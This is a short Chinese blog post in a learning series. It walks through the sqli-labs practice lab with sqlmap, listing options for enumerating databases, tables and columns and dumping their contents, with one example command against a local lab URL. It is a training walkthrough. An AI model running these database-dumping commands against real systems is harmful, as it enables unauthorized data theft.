通过sqli-labs学习SQL注入(4)
这次用sqlmap来通关一次sqli-labs
主要使用的参数:
-u
可能有注入点的url--users
列出用户--dbs
列出数据库--current-db
当前数据库--current-user
当前用户--tables
列出所有数据库的表名,加-D
参数用来获取指定数据库的表名--columns
列出数据库的所有列(字段),加-T
参数指定表名--dump -C"columns_name"
dump出指定列内容
实例演示:目标url"http://192.168.155.128/sqli-labs/Less-1/?id=1"
python sqlmap.py -u "http://192.168.155.128/sqli-labs/Less-1/?id=1" --dbs
选择感兴趣的数据库,这里选择security
查看指定表名的列
直接dump出users表的内容
也可以加-C "username"
dump指定列username的内容,--dump-all
dump所有数据库的内容
sqli-labs GET型注入前几关一路杀通,有一关需要把--level
参数调高才能注入
后面的post注入,加上参数--forms
就行,根据提示做选择
还有很多参数没提到,具体的参考sqlmap文档吧,主要用的就是这些了
相关推荐
ALiDan 2020-07-27
qshpeng 2020-07-26
世樹 2020-07-17
chenjiazhu 2020-07-08
一对儿程序猿 2020-07-04
明月清风精进不止 2020-06-13
godfather 2020-06-13
ItBJLan 2020-06-11
tanrong 2020-06-11
ALiDan 2020-06-11
码墨 2020-06-09
世樹 2020-06-05
lt云飞扬gt 2020-06-03
godfather 2020-06-03
qshpeng 2020-05-11
明月清风精进不止 2020-05-07
gwn00 2020-05-07